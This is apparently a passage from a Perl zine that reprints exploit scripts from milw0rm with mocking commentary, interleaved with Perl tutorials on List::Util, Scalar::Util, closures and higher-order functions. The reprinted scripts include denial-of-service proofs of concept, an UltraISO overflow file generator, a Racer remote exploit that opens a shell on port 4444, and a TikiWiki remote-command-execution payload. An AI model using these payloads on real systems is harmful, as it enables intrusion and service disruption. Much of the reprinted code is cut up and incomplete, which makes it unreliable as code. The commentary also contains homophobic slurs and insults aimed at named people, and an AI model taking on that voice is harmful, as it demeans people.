but don't forget to think about how your data structures work to see if
you can make them use less RAM.
#!/usr/bin/perl
##Credit to n00b for finding this bug..^ ^
############################################################################
#Media Center 11 d0s exploit overly long string.
#TiVo server plugin..Runs on port tcp :8070
#Also J. River UPnP Server Version 1.0.34
#is also afected by the same bug which is just a
#dos exploit.As we know the port always changes for the
#UPnP server so you may have to modify the proof of concept a little
#This exploit will deny legitimate user's from using the service
#We should see a error with the following msg Upon sucsessfull exploitation.
#All 3 of the server plugin's will fail includin the library server which
#is set to port :80 by default.The only debug info i was able to collect
#at crash time is also provided with the proof of concept.
#As you can see from the debug info provided we canot control any memory
#Adresses.
#Shout's to aelph and every-one who has helped me over the year's.
#############################################################################
# X Microsoft Visual C ++ Runtime Library
#
# Buffer overrun detected!
#
# C:\Program Files\J River\Media Center 11\Media center.exe
#
# A Buffer overrun has been detected which has corrupted the program's
# internal state. The program cannot safely continue execution and must
# be now terminated.
# Bah fucking shame..
##############################################################################
#o/s info: win xp sp.2 Media Center 11.0.309 (not registered)
# \\ DEBUG INFO //
#
#eax=77c26ed2 ebx=00000000 ecx=77c1129c edx=00000000 esi=77f7663e edi=00000003
#eip=7ffe0304 esp=01b7e964 ebp=01b7ea5c iopl=0 nv up ei pl nz na pe nc
#cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00000202
#SharedUserData!SystemCallStub+0x4:
#7ffe0304 c3 ret
##############################################################################
print "Media Center 11.0.309 Remote d0s J River TiVo server all 3 plugin's are vuln by n00b \n";
$payload = "\x41"x5500;
$socket = IO::Socket::INET->new(PeerAddr=>$ip,
PeerPort=>$port,
Proto=>$protocol,
Timeout=>'1') || die "Make sure service is running on the port\n";
# Make sure brain is implanted in that light bulb you call a head
# milw0rm.com [2006-09-05]
#!/usr/bin/perl
#Moderator of http://igniteds.net
##############################################################################
#X fire version:new Release 1.64 <12th, 2006>
##############################################################################
# Comments removed due to high level of homosexuality
print " 0day Xfire remote dos exploit coded by n00b Release 1.64 <12th, 2006> \n";
# Trying to look leet now? Or did we completely forget the 'x' operator now?
$payload = "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41";
$port = '25777'; # DON'T EVER QUOTE INTEGERS AGAIN YOU USELESS PIECE OF SHIT
$socket = IO::Socket::INET->new(PeerAddr=>$ip,
PeerPort=>$port,
Proto=>$protocol,
Timeout=>'1') || die "Make sure service is running on the port\n";
# milw0rm.com [2006-10-16]
#!/usr/bin/perl
############################################################
#Credit:To n00b for finding this bug and writing poc.
############################################################
#Ultra ISO stack over flow poc code.
#Ultra iso is exploitable via opening
#a specially crafted Cue file..There is
#A limitation that the user must have the bin
#file in the same dir as the cue file.
#This is the reason i have provided the
#Bin file also Command execution is possible
#As we can control $ebp and $eip hoooooha.
#I will be working on the local exploit
#as soon as i get a chance this should be a straight forward
#to exploit this as we already gain control of the
#$eip register..
#Tested on :win xp service pack 2
#Vendor's web site: http://www.ezbsystems.com/ultraiso
# Version affected: UltraISO 8.6.2.2011
############################################################
#Debug info as follows.
#########################################
#Program received signal SIGSEGV, Segmentation fault.
#[Switching to thread 1696.0x6d0]
#0x41414141 in ?? ()
############################################################
#(gdb) i r
#eax 0x0 0
#ecx 0x7ce2fc 8184572
#edx 0x1 1
#ebx 0xfe6468 16671848
#esp 0x13ecf8 0x13ecf8
#ebp 0x41414141 0x41414141
#esi 0x0 0
#edi 0x13fa18 1309208
#eip 0x41414141 0x41414141
#eflags 0x10246 66118
#cs 0x1b 27
#ss 0x23 35
#ds 0x23 35
#es 0x23 35
#fs 0x3b 59
#gs 0x0 0
#fctrl 0xffff1273 -60813
#fstat 0xffff0000 -65536
#ftag 0xffffffff -1
#fiseg 0x0 0
#fioff 0x0 0
#foseg 0xffff0000 -65536
#fooff 0x0 0
#---Type <return> to continue, or q <return> to quit---
#fop 0x0 0
#(gdb)
############################################################
print
"~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n";
print "0day Ultra-Iso 8.6.2.2011 stack over flow poc \n";
print "Credits to n00b for finding the bug and writing poc\n";
print "I will be writing a local exploit for this in a few days\n";
print "Shouts: - Str0ke - Marsu - SM - Aelphaeis - vade79 - c0ntex\n";
print
"~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n";
my $header= "\x46\x49\x4c\x45\x20\x22";
my $endheader=
"\x2e\x42\x49\x4e\x22\x20\x42\x49\x4e\x41\x52\x59\x0d\x0a\x20".
"\x54\x52\x41\x43\x4b\x20\x30\x31\x20\x4d\x4f\x44\x45\x31\x2f\x32".
"\x33\x35\x32\x0d\x0a\x20\x20\x20\x49\x4e\x44\x45\x58\x20\x30\x31".
"\x20\x30\x30\x3a\x30\x30\x3a\x30\x30";
sleep(5); # :(
print
"~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n";
# print <<'GAYMESSAGE'
print "Files have been created success-fully\n";
# Multiline, quotefree
print "Please note you will have to have both 1.cue and 1.bin in the same dir\n"; # uselessness here
print "To be able to reproduce the bug open the 1.cue file with ultra~iso\n"; # end with
print
"~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n";
# GAYMESSAGE
# milw0rm.com [2007-05-24]
#!/usr/bin/perl
###Credit's to n00b.
################################################
#Racer v0.5.3 beta 5 (12-03-07) remote exploit.
#Racer is also prone to a buffer over flow in the
#server and client.Automatically the game open's
#Udp port 26000 and is waiting for a msg buffer.
#If we send an overly long buffer we are able to
#Control the eip register and esp hold's enough
#buffer to have a good size shell code.
###############################################
#Tested: Win Xp sp2 English
#Vendor's web site: http://www.racer.nl/
#Affected version's: all version's.
#Tested on: Racer v0.5.3 beta 5 (12-03-07).
#Special thank's to str0ke.
###########################
Disclaimer
----------
The information in this advisory and any of its
demonstrations is provided "as is" without any
warranty of any kind.
I am not liable for any direct or indirect damages
caused as a result of using the information or
demonstrations provided in any part of this advisory.
Educational use only..!!
*****************************************************
Shout's ~ str0ke ~ c0ntex ~ marsu ~v9@fakehalo
Luigi Auriemma.
*****************************************************
(*)Please wait
End
use IO::Socket;
$payload2 = "B"x500;
# check it earlier
if(!$ip) # Useless
{
$protocol = 'udp'; # :(
$socket = IO::Socket::INET->new(PeerAddr=>$ip,
PeerPort=>$port,
Proto=>$protocol,
Timeout=>'1') || die "Make sure service is running on the port\n";
# die "please keep your dirty ape hands off perl.
{
print $socket $payload1,$jmpcode,$shellcode,$payload2,;
print "[+]Sending malicious payload.\n";
sleep 2;
system("cls");
print "[+]Done !!.\n";
close($socket);
{
sleep 5;
print " + Connecting on port 4444 of $host ...\n";
system("telnet $ip 4444"); # OMFG!
close($socket);
}
}
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#Microsoft Windows XP [Version 5.1.2600]
#(C) Copyright 1985-2001 Microsoft Corp.
# C:\Documents and Settings\****\Desktop\racer053b5>
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# milw0rm.com [2007-08-13]
Perl also has its own ``utility belts'', namely Scalar::Util and
List::Util. These modules were added into the core around Perl version
5.8, although you can install them from the CPAN into any modern Perl
version. Let's take a look at what our Perl utility belts contain.
At first glance, this seems similar to the ref builtin function. However,
consider this:
ref []; # "ARRAY"
blessed []; # undef
Yes, for an unblessed reference, ref returns the primitive data type (such
as ARRAY or HASH), while blessed returns undef.
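Whereas for a blessed reference, blessed earns its name:

```perl
use Scalar::Util qw(blessed);

my $obj = bless {}, 'My::Class';

blessed $obj;        # "My::Class"
blessed [];          # undef - a plain, unblessed reference
blessed "a string";  # undef - not a reference at all
```

So blessed is the reliable "is this actually an object?" test, where ref alone can't tell you.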
The dualvar function helps us create a single value that acts like the $!
built-in. $! is odd in that it has one value in a numeric context (the
error number, such as 13), and a related but different value in a string
context (the error string, such as Permission denied). We can create a
similar value using dualvar:
use Scalar::Util qw(dualvar);
my $result = dualvar(13, "Permission Denied");
if ($result == 13) { ... } # true
if ($result =~ /denied/i) { ... } # also true!
I'll save the rest of that cool module for another time.
The classic way of testing whether something is an open filehandle was to use defined fileno, as in:
if (defined fileno $somereference) { ... }
I've never used the refaddr function, but it looks like a nice way to
detect whether a scalar is a reference or not, and if so, what the memory
address might be:
use Scalar::Util qw(refaddr);
refaddr "hello"; # undef
refaddr []; # some numeric value
Note that this differs from the built-in ref because ref returns the
blessed class for objects, and can be fooled to return one of the built-in
names if you're really perverse:
ref bless [], "Foo"; # "Foo"
ref bless {}, "ARRAY"; # "ARRAY" (don't do this!)
I've also never used the set_prototype function, and subroutine prototypes
are generally discouraged, but I'll mention it here anyway for
completeness:
use Scalar::Util qw(set_prototype);
my $s = sub { ... };
set_prototype $s, '$$';
# same as: $s = sub ($$) { ... };
The weaken function weakens its lvalue (scalar variable) argument so that
the reference contained within the variable is weak. A weak reference
still functions as a normal reference with respect to dereferencing, but
does not count as a reference when Perl is considering whether there are
any references to a value. Incidentally, a copy of a weak reference is not
also weak, unless you also weaken it.
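A sketch of the root-and-kids structure discussed next (the names $root, $leaf1 and $leaf2 are mine):

```perl
use Scalar::Util qw(weaken);

my $leaf1 = { name => 'leaf1' };
my $leaf2 = { name => 'leaf2' };
my $root  = { kids => [ $leaf1, $leaf2 ] };

# Downlinks stay as normal, counted references; the uplinks are
# weakened so they don't keep the root alive on their own.
for my $kid (@{ $root->{kids} }) {
    $kid->{parent} = $root;
    weaken $kid->{parent};
}
```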
Now, we can get from the root to the kids, and from the kids to the root,
using the existing references. However, the links from the kids to the
root won't count, so Perl treats the literal $root as the only path to
that hash. When $root goes out of scope, any weakened references to the
hash (as in, the values for each of the parent uplinks) are set to undef.
The refcounts of the two kids nodes are also reduced. If $leaf1 and $leaf2
are also going out of scope, then the corresponding hashes are also now
unreferenced, causing the entire data structure to disappear.
Note that weaken and isweak appear only when you install the ``XS''
version of the module.
First, let's look at (the appropriately titled) first. Let's say you have
a list of items, and you want to find the first one that is greater than
ten characters. Simply pull out first, like this:
use List::Util qw(first);
my $big_enough = first { length > 10 } @the_list;
The first routine walks through the list similar to grep or map, placing
each item into $_. The block is then evaluated, looking for a true or
false value. If true, the corresponding value of $_ is returned
immediately. If every evaluation of the block returns false, then first
returns undef.
However, the first routine avoids testing the remainder of the list once
we have found our item of choice. For short lists, we might not care, but
for long lists, this can save us some time if we expect a true value
somewhat early in the list.
We do lose a tiny bit of information with first as well. If undef is a
significant return value, we can't tell the undef as one of the list
members from the undef returned at the end of the list. For example, if we
wanted the ``first undef'' from a list:
my $first_undef = first { not defined $_ } @items;
Admittedly, I can't recall where I've ever cared that much. But it's an
interesting thing to think about when designing return values from
functions. But enough on first. Let's move on.
The next easy utility to describe from List::Util is shuffle. Yes, many
programs need a randomly ordered list of values, and here we have it as a
simple word:
use List::Util qw(shuffle);
my @deck = shuffle
map { "C$_", "D$_", "H$_", "S$_" }
0..9, qw(A K Q J);
Now our deck of cards is shuffled, and rather fairly and quickly. Like
sorting, shuffling is one of those things that looks rather easy to
implement, but turns out to have tricky parts to get right. And in the
normal List::Util installation, this is implemented at the C level (using
XS), so it's quite fast.
One of my favorite ``obscure but cool once you understand it'' functions
in list-processing languages is reduce, and although Perl doesn't have it
as a built-in, we can at least get to it with List::Util.
Similar to sort, reduce takes a block argument that references $a and $b.
This is best illustrated by example:
use List::Util qw(reduce);
my $total = reduce { $a + $b } 1, 2, 4, 8, 16;
For the first evaluation of the block, $a and $b take on the first and
second elements of the list: 1 and 2 in this case. The block is evaluated
(returning 3), and this value is placed back into $a, and the next value
is placed in $b (4). Once again, the block is evaluated (7), and the
result placed in $a, and a new $b comes from the list. When there are no
more items in the list, the result is returned instead. The effect is if
we had written:
my $total = ((((1 + 2) + 4) + 8) + 16);
but scaled for however many elements are in the list. Nice!
By adding some smarts into the block, we can find the numeric maximum of a
list of values:
my $numeric_max = reduce { $a > $b ? $a : $b } @inputs;
This works because we select the winner of any given pair of values, and
if we keep carrying that winner forward, eventually the winningest winner
comes out the end.
For a string maximum (``z'' preferred to ``a''), just change the type of
the comparison:
my $string_max = reduce { $a gt $b ? $a : $b } @inputs;
And for minimums, we can change the order of the comparison, or swap the
selection of $a and $b.
For convenience, List::Util provides max, maxstr, min, minstr, and sum
directly.
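So the reduce spellings above collapse to one-liners:

```perl
use List::Util qw(max maxstr min sum);

my @inputs = (3, 1, 4, 1, 5, 9);

my $biggest  = max @inputs;                   # 9
my $smallest = min @inputs;                   # 1
my $total    = sum @inputs;                   # 23
my $last_str = maxstr qw(apple pear banana);  # "pear"
```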
I learned Smalltalk long before I learned Perl, and got quite fond of the
inject:into: method for collections. The reduce routine maps rather
nicely, if I think of Smalltalk's:
aCollection inject: firstValue into: [:a :b | "something with a and b"]
as Perl's:
reduce { "something with $a and $b" } $firstValue, @aCollection;
Note that on each iteration, $a is used, and also returned to become the
new $a or the final result. This is reminiscent of the many uses of
inject:into: in the Smalltalk images I've seen.
That wraps up List::Util, but I've still got a few inches of room here, so
let's take a quick look at the CPAN module List::MoreUtils. Although it
isn't part of the core, it's referenced in List::Util, because the module
provides a few handy shortcuts implemented (again) in C code for speed.
Like List::Util, all imports must be specifically requested.
The any routine returns a boolean result if any of the items in the list
meet the given criterion, using a $_ proxy similar to grep or map:
use List::MoreUtils qw(any);
my $has_some_defined = any { defined $_ } @some_list;
Note that you could easily define any in terms of all and vice-versa, just
by negating both the condition and the result value. (These items are far
more efficient than their same-named ``equivalents'' in
Quantum::Superpositions.)
If you negate only the result values (or just the condition, depending on
how you look at it), you get two other routines defined by
List::MoreUtils, none and notall:
use List::MoreUtils qw(none notall);
my $has_no_defined = none { defined $_ } @some_list;
my $has_some_undef = notall { defined $_ } @some_list;
If you're just counting true and false values, true and false are at your
service:
use List::MoreUtils qw(true false);
my $bigger_than_10_count = true { $_ > 10 } @some_list;
my $not_bigger_than_10_count = false { $_ > 10 } @some_list;
Again, these are complementary, so use the one that reads better for your
task.
The first_index and last_index routines return where an item appears. For
example, suppose I want to know which item is the first item that is
bigger than 10:
use List::MoreUtils qw(first_index);
my $where = first_index { $_ > 10 } 1, 2, 4, 8, 16, 32;
The result here is 4, indicating that 16 is the first item greater than
10. The index value is 0-based. If the item is not found, -1 is returned,
like Perl's built-in index search for strings. last_index works like
rindex, working from the upper end of the list rather than the lower end.
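List::MoreUtils also provides an indexes routine, which returns every matching position at once rather than just the first or the last:

```perl
use List::MoreUtils qw(indexes);

# All positions whose elements satisfy the condition.
my @where = indexes { $_ > 10 } 1, 2, 4, 8, 16, 32;
```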
The result is 4, 5, showing that elements 4 and 5 of the input list match
the condition.
The apply routine is like the built-in map, but automatically localizes
the $_ value so we can safely change it within the block:
use List::MoreUtils qw(apply);
my @no_leading_blanks = apply { s/^\s+// } @input;
Had we used map instead of apply here, we'd see two problems. First, the
result of a substitution is not the
new string, but the success value, so the outputs would simply be a series
of true and false values. Second, the $_ value is aliased to the inputs,
so @input would have been changed. Oops. The equivalent to the apply with
map would be something like:
my @output = map { local $_ = $_; [apply action here]; $_ } @input;
And yes, the many times I've written map blocks that look just like that,
I could have replaced them with apply.
And List::MoreUtils contains a few more routines as well, but I've now run
out of space. I hope you find this little trip into the ``utility belts''
of Perl fun and handy. Until next time, enjoy!
#!/usr/bin/perl
#
# dhcp fuzzer, first without options
# will do options later ...
#
# update: - replaced obsolete Net::RawIP with more powerfull Net::Packet
# (a bit bitchy to install tho ...)
# - added totally unintelligent options fuzzing
#
# Pretty hackish, but it seems to work ...
# version 0.2 By Ilja van Sprundel.
#
# Todo: - give verbose output
# - run in deamon mode, find dhcp id's and remember mac addr
# - clean up the protocol implementation (I basicly copypasted what
# was in ethereal, ...)
#
# Net::Packet does a few annoying sleep()'s that I don't need
# and they get in the way of fuzzing, so just preload perl
# with the following tiny piece of code and all should be well.
#
##define LIBC "/lib/libc.so.6"
#
#int sleep(int sec) {
# void *handle;
# int r = 0;
# int (*osleep)(int);
# handle = dlopen(LIBC, 1);
# osleep = dlsym(handle, "sleep");
# if (sec != 1)
# r = osleep(sec);
# dlclose(handle);
# return(r);
#}
if ( int(rand() * 10) ) {
$hwtype = int(rand() * 10) % 6;
} else {
$hwtype = int(rand() * 1000) % 256;
}
if ( int(rand() * 10) ) {
$hops = 0;
} else {
$hops = int(rand() * 1000) % 256;
}
if ( int(rand() * 10) ) {
$seconds = int(rand() * 10) % 16;
} else {
$seconds = int(rand() * 100000) % 65536;
}
if ( int(rand() * 10) ) {
$flags = 0x0000;
} else {
$flags = int(rand() * 100000) % 65536;
}
# Don't you get annoyed at having this over and over again?
$clientip = int(rand() * 10000000000) % (0xffffffff + 1);
$yourip = int(rand() * 10000000000) % (0xffffffff + 1);
$nextip = int(rand() * 10000000000) % (0xffffffff + 1);
$relayip = int(rand() * 10000000000) % (0xffffffff + 1);
if ( int(rand() * 10) ) {
$clientaddr =
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";
# my $clientaddr = "\x00" x 16;
} else {
read($fd, $clientaddr, 16);
}
if ( int(rand() * 10) ) {
$sname =
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";
# my $sname = "\x00" x 64;
} else {
read($fd, $sname, 64);
}
if ( int(rand() * 10) ) {
$file =
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";
# my $file = "\x00" x 128;
} else {
read($fd, $file, 128);
}
#
# this is the options fuzzing :) h4h4
#
# h4h4 1nd33d
#
# you gotta love Net::Packet !!!!
#
# Yup. You also gotta love how your variables suddenly become lexical...
# LOOKS LIKE SOMEONE COPIED AND PASTED
my $eth = Net::Packet::ETH->new(type => NP_ETH_TYPE_IPv4, dst =>
"FF:FF:FF:FF:FF:FF");
my $ip = Net::Packet::IPv4->new(src => '0.0.0.0', dst =>
'255.255.255.255', protocol => NP_IPv4_PROTOCOL_UDP);
my $udp = Net::Packet::UDP->new(src => 68, dst => 67);
my $content = Net::Packet::Layer7->new(data => $data);
my $frame = Net::Packet::Frame->new(l2 => $eth, l3 => $ip, l4 => $udp, l7
=> $content);
$frame->send;
# Nice spacing.
# Ilja you sure make it look like you did a lot more work than you did.
# You have the creativity of a 19th century Polish serf...motherfucker!
# Ilja, how's working at suresec? Are they paying you by the blowjob like
# Immunity?
Limbic~Region
How A Function Becomes Higher Order
All:
Higher Order Perl, by Dominus, has become a very popular book. It was
written to teach programmers how to transform programs with programs. Many
of us who do not have familiarity with Functional Programming are not
aware of what a Higher Order function is. It is a function that does at
least one of the two following things:
Accepts a function as input
Returns a function as output
For some, you can stop reading here because you already know what Higher
Order functions are - you just didn't know that's what they were called.
In Perl terminology, we often refer to them as callbacks, factories, and
functions that return code refs (usually closures). Even if you are
familiar with those terms, you may not be familiar with how to use them.
As time goes by "just this once" has happened many times and we decide to
make our version reusable.
sub gen_max {
# Create an initial default value (or undef)
my $max = $_[0];
my $max = gen_max();
while ( <FH> ) {
chomp;
This is our first step into Higher Order functions as we have returned a
function as the output for the sake of reusability. We also have a few
advantages over the original List::Util max function.
Does not require all values to be present at once
Ability to define a starting value
Ability to process one or more values at a time
return sub {
    for ( @_ ) {
        $max = $_ if ! defined $max || $_ > $max;
    }
    return $max;
};
}
This does not have to be the end of the journey into Higher Order
functions, though it is the end of the tutorial. Whenever you encounter a
situation where two programs do nearly identical things but their
differences are enough to make using a single function impossible -
consider Higher Order functions to bridge the gap. Remember - it is
important to always document your interface and assumptions well!
elsif($FORM{'file'} =~ /.(\)*./g){
Those three lines, from three different scripts, are all bad in multiple
embarrassing ways.
The historians among you might note that kokanin was the very first
article in the very first Perl Underground. Here's to our man!
#!/usr/bin/perl
# kokanin@gmail dot com 20070604
# ARP dos, makes the target windows pc unusable for the duration of the attack.
# <mode> determines if we send directly or via broadcast, bcast seems
# to be more effective (works even when printing info locally)
# Why store mac addresses for addresses outside ones subnet? Weird.
# FIXME: sometimes this crashes on the first run due to a slow arp reply
$mode = shift;
$interface = shift;
$host = shift;
Closure on Closures
by broquaint
Before we get into this tutorial we need to define what a closure is. The
Camel (3rd edition) states that a closure is
Now with that (simple?) definition out of the way, we can get on with the
show!
Right, are we all here now? Bueller ... Bueller .. Bueller? Good.
Now that we have our basic elements, let's weave them together with a
stitch of explanation and a thread of code.
Hanging around
Now as we all know, lexical variables are only active for the length of
the surrounding lexical scope, but can be kept around in an indirect
manner if something else references them, e.g.
__output__
$foo: [a string]
$foo: []
As we can see the answer is categorically 'No'. In retrospect this is
quite obvious as $foo has gone out of scope and there is no longer a
reference to it.
A bit of closure
However, the last example just used a simple bareblock, now let's try it
with a subroutine as the inner block
1: {
2: my $foo = "a string";
3: sub inner {
4: print "\$foo: [$foo]\n";
5: }
6: }
7: inner();
8: inner();
__output__
$foo: [a string]
$foo: [a string]
"Hold on there cowboy - $foo has already gone out of scope at the time of
the first call to inner() let alone the second, what's going on there?!?",
or so one might say. Now hold your horses, there is a very good reason for
this behaviour - the subroutine in the example is a closure. "Ok, so it's
a closure, but why?", would be a good question at this point. The reason
is that subroutines in perl have what's called a scratchpad which holds
references to any lexical variables referred to within the subroutine.
This means that you can directly access lexical variables within
subroutines even though the given variables' scope has exited.
Hmmm, that was quite a lot of raw info, so let's break it down somewhat.
Firstly subroutines can hold onto variables from higher lexical scopes.
Here's a neat little counter example (not counter-example ;)
1: {
2: my $cnt = 5;
3: sub counter {
4: return $cnt--;
5: }
6: }
7:
8: while(my $i = counter()) {
9: print "$i\n";
10: }
11: print "BOOM!\n";
__output__
5
4
3
2
1
BOOM!
While not immediately useful, the above example does demonstrate a
subroutine counter() (line 3) holding onto a variable $cnt (line 2) after
it has gone out of scope. Because of this behaviour of capturing lexical
state the counter() subroutine acts as a closure.
Now if we look at the above example a little closer we might notice that
it looks like the beginnings of a basic iterator. If we just tweak
counter() and have it return an anonymous sub we'll have ourselves a very
simple iterator
1: sub counter {
2: my $cnt = shift;
3: return sub { $cnt-- };
4: }
5:
6: my $cd = counter(5);
7: while(my $i = $cd->()) {
8: print "$i\n";
9: }
10:
11: print "BOOM!\n";
__output__
5
4
3
2
1
BOOM!
Now instead of counter() being the closure we return an anonymous
subroutine (line 3) which becomes a closure as it holds onto $cnt (line
2). Every time the newly created closure is executed the $cnt passed into
counter() is returned and decremented (this post-return modification
behaviour is due to the nature of the post-decrement operator, not the
closure).
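Here's a closure-based directory iterator in the same style, a minimal sketch using IO::Dir:

```perl
use IO::Dir;

sub dir_iter {
    my $dir = IO::Dir->new(shift) or die "couldn't open directory: $!";

    return sub { $dir->read };
}

my $di = dir_iter('.');
while (defined(my $file = $di->())) {
    print "$file\n";
}
```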
__output__
.
..
.closuretut.html.swp
closuretut.html
example5.pl
example6.pl
example2.pl
example1.pl
example3.pl
example4.pl
example7.pl
In the code above dir_iter() (line 3) is returning an anonymous subroutine
(line 6) which is holding $dir (line 4) from a higher scope and therefore
acts as a closure. So we've created a very basic directory iterator using
a simple closure and a little bit of help from IO::Dir.
Wrapping it up
This method of creating closures using anonymous subroutines can be very
powerful[1]. With the help of Richard Clamp's marvellous File::Find::Rule
we can build ourselves a handy little grep-like tool for XML files:
1: use strict;
2: use warnings;
3:
4: use XML::Simple;
5: use Getopt::Std;
6: use File::Basename;
7: use File::Find::Rule;
8: use Data::Dumper;
9:
10: $::PROGRAM = basename $0;
11:
12: getopts('n:t:hr', my $opts = {});
13:
14: usage() if $opts->{h} or @ARGV == 0;
15:
16: my @dirs = $opts->{r} ? @ARGV : map dirname($_), @ARGV;
17: my @files = $opts->{r} ? '*.xml' : map basename($_), @ARGV;
18: my $callback = gensub($opts);
19:
20: my @found = find(
21: file =>
22: name => \@files,
23: ## handy callback which wraps around the callback created above
24: exec => sub { $callback->( XMLin $_[-1] ) },
25: in => [ @dirs ]
26: );
27:
28: print "$::PROGRAM: no files matched the search criteria\n" and exit(0)
29: if @found == 0;
30:
31: print "$::PROGRAM: the following files matched the search criteria\n",
32: map "\t$_\n", @found;
33:
34: exit(0);
35:
36: sub usage {
37: print "Usage: $::PROGRAM -t TEXT [-n NODE -h -r] FILES\n";
38: exit(0);
39: }
40:
41: sub gensub {
42: my $opts = shift;
43:
44: ## basic matcher wraps around the program options
45: return sub { Dumper($_[0]) =~ /\Q$opts->{t}/sm }
46: unless exists $opts->{n};
47:
48: ## node based matcher wraps around options and itself!
49: my $self; $self = sub {
50: my($tree, $seennode) = @_;
51:
52: for(keys %$tree) {
53: $seennode = 1 if $_ eq $opts->{n};
54:
55: if( ref $tree->{$_} eq 'HASH') {
56: return $self->($tree->{$_}, $seennode);
57: } elsif( ref $tree->{$_} eq 'ARRAY') {
58: return !!grep $self->($_, $seennode), @{ $tree->{$_} };
59: } else {
60: next unless $seennode;
61: return !!1
62: if $tree->{$_} =~ /\Q$opts->{t}/;
63: }
64: }
65: return;
66: };
67:
68: return $self;
69: }
Disclaimer: the above isn't thoroughly tested and isn't nearly perfect, so
think twice before using it in the real world.
Altogether now
There ya go, closure on closures! Hopefully this tutorial has conveyed the
meaning and purpose of closures in perl and hasn't been too confounding
along the way.
[0] see chip's Re: Toggling between two values for a more technical
definition (and discussion) of closures within perl
[1] see tilly's Re (tilly) 9: Why are closures cool?, on the pitfalls of
nested package level subroutines vs. anonymous subroutines when dealing
with closures
#!/usr/bin/perl
# TikiWiki <= 1.9.8 Remote Command Execution Exploit
#
# Description
# -----------
# TikiWiki contains a flaw that may allow a remote attacker to execute
# arbitrary commands.
# The issue is due to the 'tiki-graph_formula.php' script not properly
# sanitizing user input supplied to the f variable, which may allow a
# remote attacker to execute arbitrary PHP commands resulting in a loss
# of integrity.
# -----------
# Vulnerability discovered by ShAnKaR <sec [at] shankar.antichat.ru>
#
# $Id: milw0rm_tikiwiki.pl,v 0.1 2007/10/12 13:25:08 str0ke Exp $
use strict; # Hey, you're learning! But you still forgot to enable warnings.
use LWP::UserAgent;
# Try this:
# my($target, $proxy) = @ARGV;
while()
{
print "tiki\# ";
chomp($command = <STDIN>); # You do realize that you can declare
# $command down here right?
# chomp(my $command = <STDIN>);
# Then we can lose that annoying
# declaration up at the top of the code.
exit unless $command; # Not bad.
&exploit($target, $command, $proxy);
# You really must like the &'s, eh?
}
sub usage()
{
print "[?] TikiWiki <= 1.9.8 Remote Command Execution Exploit\n"; # ph33r
print "[?] str0ke <str0ke[!]milw0rm.com>\n";
print "[?] usage: perl $0 [target]\n";
print " [target] (ex. http://127.0.0.1/tikiwiki)\n";
print " [proxy] (ex. 0.0.0.0:8080)\n";
exit;
# You could have used a heredoc with a die instead of all those
# print's followed by an exit. If you're going to use print,
# at least change your quoting style.
}
sub exploit()
{
my($target, $command, $proxy) = @_; # Not bad.
my $out=$conn->get($target."/tiki-graph_formula.php?w=1&h=1&s=1&min=1&max=2&f[]=x.tan.passthru($byte).die()&t=png&title=");
# Way to be consistent with your concatenations there.
if ($out->content =~ m/start_er(.*?)end_er/ms) {
# Perl doesn't need to be told it's a match
print $1 . "\n";
} else {
print "[-] Exploit Failed\n"; # Just like this code...
exit; # Why not try die? After all, you don't want to exit
# indicating success when it didn't succeed.
}
}
# milw0rm.com [2007-10-12]
# PU5
( It is important to note that this is old, and some things about the
language have changed. Further, a handful of these points were never
the popular view in the Perl world. So keep those in mind. )
